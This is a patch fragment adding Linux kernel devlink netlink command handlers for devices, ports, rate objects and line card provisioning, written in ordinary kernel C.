++devlink_rate_is_parent_node(struct devlink_rate *devlink_rate,
++			    struct devlink_rate *parent)
++{
++	while (parent) {
++		if (parent == devlink_rate)
++			return true;
++		parent = parent->parent;
++	}
++	return false;
++}
++
++static int devlink_nl_cmd_get_doit(struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
++			      info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_get_dumpit(struct sk_buff *msg,
++				     struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (idx < start) {
++			idx++;
++			devlink_put(devlink);
++			continue;
++		}
++
++		devl_lock(devlink);
++		err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
++				      NETLINK_CB(cb->skb).portid,
++				      cb->nlh->nlmsg_seq, NLM_F_MULTI);
++		devl_unlock(devlink);
++		devlink_put(devlink);
++
++		if (err)
++			goto out;
++		idx++;
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_nl_cmd_port_get_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_port_fill(msg, devlink_port, DEVLINK_CMD_PORT_NEW,
++				   info->snd_portid, info->snd_seq, 0,
++				   info->extack);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_port_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_port *devlink_port;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(devlink_port, &devlink->port_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_port_fill(msg, devlink_port,
++						   DEVLINK_CMD_NEW,
++						   NETLINK_CB(cb->skb).portid,
++						   cb->nlh->nlmsg_seq,
++						   NLM_F_MULTI, cb->extack);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
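++/* Change the port type via the driver's port_type_set op and remember
++ * the type the user asked for so it can be reported back.
++ */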
++static int devlink_port_type_set(struct devlink_port *devlink_port,
++				 enum devlink_port_type port_type)
++{
++	int err;
++
++	if (!devlink_port->devlink->ops->port_type_set)
++		return -EOPNOTSUPP;
++
++	if (port_type == devlink_port->type)
++		return 0;
++
++	err = devlink_port->devlink->ops->port_type_set(devlink_port,
++							port_type);
++	if (err)
++		return err;
++
++	devlink_port->desired_type = port_type;
++	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
++	return 0;
++}
++
++static int devlink_port_function_hw_addr_set(struct devlink_port *port,
++					     const struct nlattr *attr,
++					     struct netlink_ext_ack *extack)
++{
++	const struct devlink_ops *ops = port->devlink->ops;
++	const u8 *hw_addr;
++	int hw_addr_len;
++
++	hw_addr = nla_data(attr);
++	hw_addr_len = nla_len(attr);
++	if (hw_addr_len > MAX_ADDR_LEN) {
++		NL_SET_ERR_MSG_MOD(extack, "Port function hardware address too long");
++		return -EINVAL;
++	}
++	if (port->type == DEVLINK_PORT_TYPE_ETH) {
++		if (hw_addr_len != ETH_ALEN) {
++			NL_SET_ERR_MSG_MOD(extack, "Address must be 6 bytes for Ethernet device");
++			return -EINVAL;
++		}
++		if (!is_unicast_ether_addr(hw_addr)) {
++			NL_SET_ERR_MSG_MOD(extack, "Non-unicast hardware address unsupported");
++			return -EINVAL;
++		}
++	}
++
++	if (!ops->port_function_hw_addr_set) {
++		NL_SET_ERR_MSG_MOD(extack, "Port doesn't support function attributes");
++		return -EOPNOTSUPP;
++	}
++
++	return ops->port_function_hw_addr_set(port, hw_addr, hw_addr_len,
++					      extack);
++}
++
++static int devlink_port_fn_state_set(struct devlink_port *port,
++				     const struct nlattr *attr,
++				     struct netlink_ext_ack *extack)
++{
++	enum devlink_port_fn_state state;
++	const struct devlink_ops *ops;
++
++	state = nla_get_u8(attr);
++	ops = port->devlink->ops;
++	if (!ops->port_fn_state_set) {
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Function does not support state setting");
++		return -EOPNOTSUPP;
++	}
++	return ops->port_fn_state_set(port, state, extack);
++}
++
++static int devlink_port_function_set(struct devlink_port *port,
++				     const struct nlattr *attr,
++				     struct netlink_ext_ack *extack)
++{
++	struct nlattr *tb[DEVLINK_PORT_FUNCTION_ATTR_MAX + 1];
++	int err;
++
++	err = nla_parse_nested(tb, DEVLINK_PORT_FUNCTION_ATTR_MAX, attr,
++			       devlink_function_nl_policy, extack);
++	if (err < 0) {
++		NL_SET_ERR_MSG_MOD(extack, "Fail to parse port function attributes");
++		return err;
++	}
++
++	attr = tb[DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR];
++	if (attr) {
++		err = devlink_port_function_hw_addr_set(port, attr, extack);
++		if (err)
++			return err;
++	}
++	/* Keep this as the last function attribute set, so that when
++	 * multiple port function attributes are set along with state,
++	 * those can be applied first before activating the state.
++	 */
++	attr = tb[DEVLINK_PORT_FN_ATTR_STATE];
++	if (attr)
++		err = devlink_port_fn_state_set(port, attr, extack);
++
++	if (!err)
++		devlink_port_notify(port, DEVLINK_CMD_PORT_NEW);
++	return err;
++}
++
++static int devlink_nl_cmd_port_set_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	int err;
++
++	if (info->attrs[DEVLINK_ATTR_PORT_TYPE]) {
++		enum devlink_port_type port_type;
++
++		port_type = nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_TYPE]);
++		err = devlink_port_type_set(devlink_port, port_type);
++		if (err)
++			return err;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_PORT_FUNCTION]) {
++		struct nlattr *attr = info->attrs[DEVLINK_ATTR_PORT_FUNCTION];
++		struct netlink_ext_ack *extack = info->extack;
++
++		err = devlink_port_function_set(devlink_port, attr, extack);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
++static int devlink_nl_cmd_port_split_doit(struct sk_buff *skb,
++					  struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = info->user_ptr[0];
++	u32 count;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PORT_SPLIT_COUNT))
++		return -EINVAL;
++	if (!devlink->ops->port_split)
++		return -EOPNOTSUPP;
++
++	count = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_SPLIT_COUNT]);
++
++	if (!devlink_port->attrs.splittable) {
++		/* Split ports cannot be split. */
++		if (devlink_port->attrs.split)
++			NL_SET_ERR_MSG_MOD(info->extack, "Port cannot be split further");
++		else
++			NL_SET_ERR_MSG_MOD(info->extack, "Port cannot be split");
++		return -EINVAL;
++	}
++
++	if (count < 2 || !is_power_of_2(count) || count > devlink_port->attrs.lanes) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Invalid split count");
++		return -EINVAL;
++	}
++
++	return devlink->ops->port_split(devlink, devlink_port, count,
++					info->extack);
++}
++
++static int devlink_nl_cmd_port_unsplit_doit(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = info->user_ptr[0];
++
++	if (!devlink->ops->port_unsplit)
++		return -EOPNOTSUPP;
++	return devlink->ops->port_unsplit(devlink, devlink_port, info->extack);
++}
++
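++/* Look up the newly created port and send a DEVLINK_CMD_NEW reply for it
++ * back to the requester. Called with the instance lock held.
++ */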
++static int devlink_port_new_notify(struct devlink *devlink,
++				   unsigned int port_index,
++				   struct genl_info *info)
++{
++	struct devlink_port *devlink_port;
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	lockdep_assert_held(&devlink->lock);
++	devlink_port = devlink_port_get_by_index(devlink, port_index);
++	if (!devlink_port) {
++		err = -ENODEV;
++		goto out;
++	}
++
++	err = devlink_nl_port_fill(msg, devlink_port, DEVLINK_CMD_NEW,
++				   info->snd_portid, info->snd_seq, 0, NULL);
++	if (err)
++		goto out;
++
++	return genlmsg_reply(msg, info);
++
++out:
++	nlmsg_free(msg);
++	return err;
++}
++
++static int devlink_nl_cmd_port_new_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink_port_new_attrs new_attrs = {};
++	struct devlink *devlink = info->user_ptr[0];
++	unsigned int new_port_index;
++	int err;
++
++	if (!devlink->ops->port_new || !devlink->ops->port_del)
++		return -EOPNOTSUPP;
++
++	if (!info->attrs[DEVLINK_ATTR_PORT_FLAVOUR] ||
++	    !info->attrs[DEVLINK_ATTR_PORT_PCI_PF_NUMBER]) {
++		NL_SET_ERR_MSG_MOD(extack, "Port flavour or PCI PF are not specified");
++		return -EINVAL;
++	}
++	new_attrs.flavour = nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_FLAVOUR]);
++	new_attrs.pfnum =
++		nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_PCI_PF_NUMBER]);
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		/* Port index of the new port being created by the driver. */
++		new_attrs.port_index =
++			nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++		new_attrs.port_index_valid = true;
++	}
++	if (info->attrs[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER]) {
++		new_attrs.controller =
++			nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER]);
++		new_attrs.controller_valid = true;
++	}
++	if (new_attrs.flavour == DEVLINK_PORT_FLAVOUR_PCI_SF &&
++	    info->attrs[DEVLINK_ATTR_PORT_PCI_SF_NUMBER]) {
++		new_attrs.sfnum = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_PCI_SF_NUMBER]);
++		new_attrs.sfnum_valid = true;
++	}
++
++	err = devlink->ops->port_new(devlink, &new_attrs, extack,
++				     &new_port_index);
++	if (err)
++		return err;
++
++	err = devlink_port_new_notify(devlink, new_port_index, info);
++	if (err && err != -ENODEV) {
++		/* Failed to send the response; destroy the newly created port. */
++		devlink->ops->port_del(devlink, new_port_index, extack);
++	}
++	return err;
++}
++
++static int devlink_nl_cmd_port_del_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	unsigned int port_index;
++
++	if (!devlink->ops->port_del)
++		return -EOPNOTSUPP;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PORT_INDEX)) {
++		NL_SET_ERR_MSG_MOD(extack, "Port index is not specified");
++		return -EINVAL;
++	}
++	port_index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++	return devlink->ops->port_del(devlink, port_index, extack);
++}
++
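++/* Handle the three parent-update cases for a rate object: an empty name
++ * detaches it from its current parent, a non-empty name attaches it to
++ * the named node, and re-parenting an already-parented object is
++ * rejected.
++ */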
++static int
++devlink_nl_rate_parent_node_set(struct devlink_rate *devlink_rate,
++				struct genl_info *info,
++				struct nlattr *nla_parent)
++{
++	struct devlink *devlink = devlink_rate->devlink;
++	const char *parent_name = nla_data(nla_parent);
++	const struct devlink_ops *ops = devlink->ops;
++	size_t len = strlen(parent_name);
++	struct devlink_rate *parent;
++	int err = -EOPNOTSUPP;
++
++	parent = devlink_rate->parent;
++	if (parent && len) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Rate object already has parent.");
++		return -EBUSY;
++	} else if (parent && !len) {
++		if (devlink_rate_is_leaf(devlink_rate))
++			err = ops->rate_leaf_parent_set(devlink_rate, NULL,
++							devlink_rate->priv, NULL,
++							info->extack);
++		else if (devlink_rate_is_node(devlink_rate))
++			err = ops->rate_node_parent_set(devlink_rate, NULL,
++							devlink_rate->priv, NULL,
++							info->extack);
++		if (err)
++			return err;
++
++		refcount_dec(&parent->refcnt);
++		devlink_rate->parent = NULL;
++	} else if (!parent && len) {
++		parent = devlink_rate_node_get_by_name(devlink, parent_name);
++		if (IS_ERR(parent))
++			return -ENODEV;
++
++		if (parent == devlink_rate) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Parent to self is not allowed");
++			return -EINVAL;
++		}
++
++		if (devlink_rate_is_node(devlink_rate) &&
++		    devlink_rate_is_parent_node(devlink_rate, parent->parent)) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Node is already a parent of parent node.");
++			return -EEXIST;
++		}
++
++		if (devlink_rate_is_leaf(devlink_rate))
++			err = ops->rate_leaf_parent_set(devlink_rate, parent,
++							devlink_rate->priv, parent->priv,
++							info->extack);
++		else if (devlink_rate_is_node(devlink_rate))
++			err = ops->rate_node_parent_set(devlink_rate, parent,
++							devlink_rate->priv, parent->priv,
++							info->extack);
++		if (err)
++			return err;
++
++		refcount_inc(&parent->refcnt);
++		devlink_rate->parent = parent;
++	}
++
++	return 0;
++}
++
++static int devlink_nl_rate_set(struct devlink_rate *devlink_rate,
++			       const struct devlink_ops *ops,
++			       struct genl_info *info)
++{
++	struct nlattr *nla_parent, **attrs = info->attrs;
++	int err = -EOPNOTSUPP;
++	u64 rate;
++
++	if (attrs[DEVLINK_ATTR_RATE_TX_SHARE]) {
++		rate = nla_get_u64(attrs[DEVLINK_ATTR_RATE_TX_SHARE]);
++		if (devlink_rate_is_leaf(devlink_rate))
++			err = ops->rate_leaf_tx_share_set(devlink_rate, devlink_rate->priv,
++							  rate, info->extack);
++		else if (devlink_rate_is_node(devlink_rate))
++			err = ops->rate_node_tx_share_set(devlink_rate, devlink_rate->priv,
++							  rate, info->extack);
++		if (err)
++			return err;
++		devlink_rate->tx_share = rate;
++	}
++
++	if (attrs[DEVLINK_ATTR_RATE_TX_MAX]) {
++		rate = nla_get_u64(attrs[DEVLINK_ATTR_RATE_TX_MAX]);
++		if (devlink_rate_is_leaf(devlink_rate))
++			err = ops->rate_leaf_tx_max_set(devlink_rate, devlink_rate->priv,
++							rate, info->extack);
++		else if (devlink_rate_is_node(devlink_rate))
++			err = ops->rate_node_tx_max_set(devlink_rate, devlink_rate->priv,
++							rate, info->extack);
++		if (err)
++			return err;
++		devlink_rate->tx_max = rate;
++	}
++
++	nla_parent = attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME];
++	if (nla_parent) {
++		err = devlink_nl_rate_parent_node_set(devlink_rate, info,
++						      nla_parent);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
++static bool devlink_rate_set_ops_supported(const struct devlink_ops *ops,
++					   struct genl_info *info,
++					   enum devlink_rate_type type)
++{
++	struct nlattr **attrs = info->attrs;
++
++	if (type == DEVLINK_RATE_TYPE_LEAF) {
++		if (attrs[DEVLINK_ATTR_RATE_TX_SHARE] && !ops->rate_leaf_tx_share_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "TX share set isn't supported for the leafs");
++			return false;
++		}
++		if (attrs[DEVLINK_ATTR_RATE_TX_MAX] && !ops->rate_leaf_tx_max_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "TX max set isn't supported for the leafs");
++			return false;
++		}
++		if (attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] &&
++		    !ops->rate_leaf_parent_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Parent set isn't supported for the leafs");
++			return false;
++		}
++	} else if (type == DEVLINK_RATE_TYPE_NODE) {
++		if (attrs[DEVLINK_ATTR_RATE_TX_SHARE] && !ops->rate_node_tx_share_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "TX share set isn't supported for the nodes");
++			return false;
++		}
++		if (attrs[DEVLINK_ATTR_RATE_TX_MAX] && !ops->rate_node_tx_max_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "TX max set isn't supported for the nodes");
++			return false;
++		}
++		if (attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] &&
++		    !ops->rate_node_parent_set) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Parent set isn't supported for the nodes");
++			return false;
++		}
++	} else {
++		WARN(1, "Unknown type of rate object");
++		return false;
++	}
++
++	return true;
++}
++
++static int devlink_nl_cmd_rate_set_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_rate *devlink_rate = info->user_ptr[1];
++	struct devlink *devlink = devlink_rate->devlink;
++	const struct devlink_ops *ops = devlink->ops;
++	int err;
++
++	if (!ops || !devlink_rate_set_ops_supported(ops, info, devlink_rate->type))
++		return -EOPNOTSUPP;
++
++	err = devlink_nl_rate_set(devlink_rate, ops, info);
++
++	if (!err)
++		devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_NEW);
++	return err;
++}
++
++static int devlink_nl_cmd_rate_new_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_rate *rate_node;
++	const struct devlink_ops *ops;
++	int err;
++
++	ops = devlink->ops;
++	if (!ops || !ops->rate_node_new || !ops->rate_node_del) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Rate nodes aren't supported");
++		return -EOPNOTSUPP;
++	}
++
++	if (!devlink_rate_set_ops_supported(ops, info, DEVLINK_RATE_TYPE_NODE))
++		return -EOPNOTSUPP;
++
++	rate_node = devlink_rate_node_get_from_attrs(devlink, info->attrs);
++	if (!IS_ERR(rate_node))
++		return -EEXIST;
++	else if (rate_node == ERR_PTR(-EINVAL))
++		return -EINVAL;
++
++	rate_node = kzalloc(sizeof(*rate_node), GFP_KERNEL);
++	if (!rate_node)
++		return -ENOMEM;
++
++	rate_node->devlink = devlink;
++	rate_node->type = DEVLINK_RATE_TYPE_NODE;
++	rate_node->name = nla_strdup(info->attrs[DEVLINK_ATTR_RATE_NODE_NAME], GFP_KERNEL);
++	if (!rate_node->name) {
++		err = -ENOMEM;
++		goto err_strdup;
++	}
++
++	err = ops->rate_node_new(rate_node, &rate_node->priv, info->extack);
++	if (err)
++		goto err_node_new;
++
++	err = devlink_nl_rate_set(rate_node, ops, info);
++	if (err)
++		goto err_rate_set;
++
++	refcount_set(&rate_node->refcnt, 1);
++	list_add(&rate_node->list, &devlink->rate_list);
++	devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_NEW);
++	return 0;
++
++err_rate_set:
++	ops->rate_node_del(rate_node, rate_node->priv, info->extack);
++err_node_new:
++	kfree(rate_node->name);
++err_strdup:
++	kfree(rate_node);
++	return err;
++}
++
++static int devlink_nl_cmd_rate_del_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_rate *rate_node = info->user_ptr[1];
++	struct devlink *devlink = rate_node->devlink;
++	const struct devlink_ops *ops = devlink->ops;
++	int err;
++
++	if (refcount_read(&rate_node->refcnt) > 1) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Node has children. Cannot delete node.");
++		return -EBUSY;
++	}
++
++	devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_DEL);
++	err = ops->rate_node_del(rate_node, rate_node->priv, info->extack);
++	if (rate_node->parent)
++		refcount_dec(&rate_node->parent->refcnt);
++	list_del(&rate_node->list);
++	kfree(rate_node->name);
++	kfree(rate_node);
++	return err;
++}
++
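++/* One provisionable type supported by a line card, as advertised by the
++ * driver.
++ */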
++struct devlink_linecard_type {
++	const char *type;
++	const void *priv;
++};
++
++static int devlink_nl_linecard_fill(struct sk_buff *msg,
++				    struct devlink *devlink,
++				    struct devlink_linecard *linecard,
++				    enum devlink_command cmd, u32 portid,
++				    u32 seq, int flags,
++				    struct netlink_ext_ack *extack)
++{
++	struct devlink_linecard_type *linecard_type;
++	struct nlattr *attr;
++	void *hdr;
++	int i;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_LINECARD_INDEX, linecard->index))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_LINECARD_STATE, linecard->state))
++		goto nla_put_failure;
++	if (linecard->type &&
++	    nla_put_string(msg, DEVLINK_ATTR_LINECARD_TYPE, linecard->type))
++		goto nla_put_failure;
++
++	if (linecard->types_count) {
++		attr = nla_nest_start(msg,
++				      DEVLINK_ATTR_LINECARD_SUPPORTED_TYPES);
++		if (!attr)
++			goto nla_put_failure;
++		for (i = 0; i < linecard->types_count; i++) {
++			linecard_type = &linecard->types[i];
++			if (nla_put_string(msg, DEVLINK_ATTR_LINECARD_TYPE,
++					   linecard_type->type)) {
++				nla_nest_cancel(msg, attr);
++				goto nla_put_failure;
++			}
++		}
++		nla_nest_end(msg, attr);
++	}
++
++	if (linecard->nested_devlink &&
++	    devlink_nl_put_nested_handle(msg, linecard->nested_devlink))
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_linecard_notify(struct devlink_linecard *linecard,
++				    enum devlink_command cmd)
++{
++	struct devlink *devlink = linecard->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_LINECARD_NEW &&
++		cmd != DEVLINK_CMD_LINECARD_DEL);
++
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_linecard_fill(msg, devlink, linecard, cmd, 0, 0, 0,
++				       NULL);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int devlink_nl_cmd_linecard_get_doit(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink_linecard *linecard = info->user_ptr[1];
++	struct devlink *devlink = linecard->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	mutex_lock(&linecard->state_lock);
++	err = devlink_nl_linecard_fill(msg, devlink, linecard,
++				       DEVLINK_CMD_LINECARD_NEW,
++				       info->snd_portid, info->snd_seq, 0,
++				       info->extack);
++	mutex_unlock(&linecard->state_lock);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_linecard_get_dumpit(struct sk_buff *msg,
++					      struct netlink_callback *cb)
++{
++	struct devlink_linecard *linecard;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		mutex_lock(&devlink->linecards_lock);
++		list_for_each_entry(linecard, &devlink->linecard_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			mutex_lock(&linecard->state_lock);
++			err = devlink_nl_linecard_fill(msg, devlink, linecard,
++						       DEVLINK_CMD_LINECARD_NEW,
++						       NETLINK_CB(cb->skb).portid,
++						       cb->nlh->nlmsg_seq,
++						       NLM_F_MULTI,
++						       cb->extack);
++			mutex_unlock(&linecard->state_lock);
++			if (err) {
++				mutex_unlock(&devlink->linecards_lock);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		mutex_unlock(&devlink->linecards_lock);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static struct devlink_linecard_type *
++devlink_linecard_type_lookup(struct devlink_linecard *linecard,
++			     const char *type)
++{
++	struct devlink_linecard_type *linecard_type;
++	int i;
++
++	for (i = 0; i < linecard->types_count; i++) {
++		linecard_type = &linecard->types[i];
++		if (!strcmp(type, linecard_type->type))
++			return linecard_type;
++	}
++	return NULL;
++}
++
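++/* Provision a line card with the given type. The state moves to
++ * PROVISIONING under the state lock, the driver op is then called with
++ * the lock dropped, and on failure the line card is put back to
++ * UNPROVISIONED.
++ */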
++static int devlink_linecard_type_set(struct devlink_linecard *linecard,
++				     const char *type,
++				     struct netlink_ext_ack *extack)
++{
++	const struct devlink_linecard_ops *ops = linecard->ops;
++	struct devlink_linecard_type *linecard_type;
++	int err;
++
++	mutex_lock(&linecard->state_lock);
++	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being provisioned");
++		err = -EBUSY;
++		goto out;
++	}
++	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONING) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being unprovisioned");
++		err = -EBUSY;
++		goto out;
++	}
++
++	linecard_type = devlink_linecard_type_lookup(linecard, type);
++	if (!linecard_type) {
++		NL_SET_ERR_MSG_MOD(extack, "Unsupported line card type provided");
++		err = -EINVAL;
++		goto out;
++	}
++
++	if (linecard->state != DEVLINK_LINECARD_STATE_UNPROVISIONED &&
++	    linecard->state != DEVLINK_LINECARD_STATE_PROVISIONING_FAILED) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card already provisioned");
++		err = -EBUSY;
++		/* Check if the line card is already provisioned in the
++		 * same way the user asks. If it is, make the operation
++		 * return success.
++		 */
++		if (ops->same_provision &&
++		    ops->same_provision(linecard, linecard->priv,
++					linecard_type->type,
++					linecard_type->priv))
++			err = 0;
++		goto out;
++	}
++
++	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONING;
++	linecard->type = linecard_type->type;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++	err = ops->provision(linecard, linecard->priv, linecard_type->type,
++			     linecard_type->priv, extack);
++	if (err) {
++		/* Provisioning failed. Assume the linecard is unprovisioned
++		 * for future operations.
++		 */
++		mutex_lock(&linecard->state_lock);
++		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++		linecard->type = NULL;
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++		mutex_unlock(&linecard->state_lock);
++	}
++	return err;
++
++out:
++	mutex_unlock(&linecard->state_lock);
++	return err;
++}
++
++static int devlink_linecard_type_unset(struct devlink_linecard *linecard,
++				       struct netlink_ext_ack *extack)
++{
++	int err;
++
++	mutex_lock(&linecard->state_lock);
++	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being provisioned");
++		err = -EBUSY;
++		goto out;
++	}
++	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONING) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being unprovisioned");
++		err = -EBUSY;
++		goto out;
++	}
++	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING_FAILED) {
++		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++		linecard->type = NULL;
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++		err = 0;
++		goto out;
++	}
++
++	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONED) {
++		NL_SET_ERR_MSG_MOD(extack, "Line card is not provisioned");
++		err = 0;
++		goto out;
++	}
++	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONING;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++	err = linecard->ops->unprovision(linecard, linecard->priv,
++					 extack);
++	if (err) {
++		/* Unprovisioning failed. Assume the linecard is unprovisioned
++		 * for future operations.
++		 */
++		mutex_lock(&linecard->state_lock);
++		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++		linecard->type = NULL;
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++		mutex_unlock(&linecard->state_lock);
++	}
++	return err;
++
++out:
++	mutex_unlock(&linecard->state_lock);
++	return err;
++}
++
++static int devlink_nl_cmd_linecard_set_doit(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink_linecard *linecard = info->user_ptr[1];
++	struct netlink_ext_ack *extack = info->extack;
++	int err;
++
++	if (info->attrs[DEVLINK_ATTR_LINECARD_TYPE]) {
++		const char *type;
++
++		type = nla_data(info->attrs[DEVLINK_ATTR_LINECARD_TYPE]);
++		if (strcmp(type, "")) {
++			err = devlink_linecard_type_set(linecard, type, extack);
++			if (err)
++				return err;
++		} else {
++			err = devlink_linecard_type_unset(linecard, extack);
++			if (err)
++				return err;
++		}
++	}
++
++	return 0;
++}
++
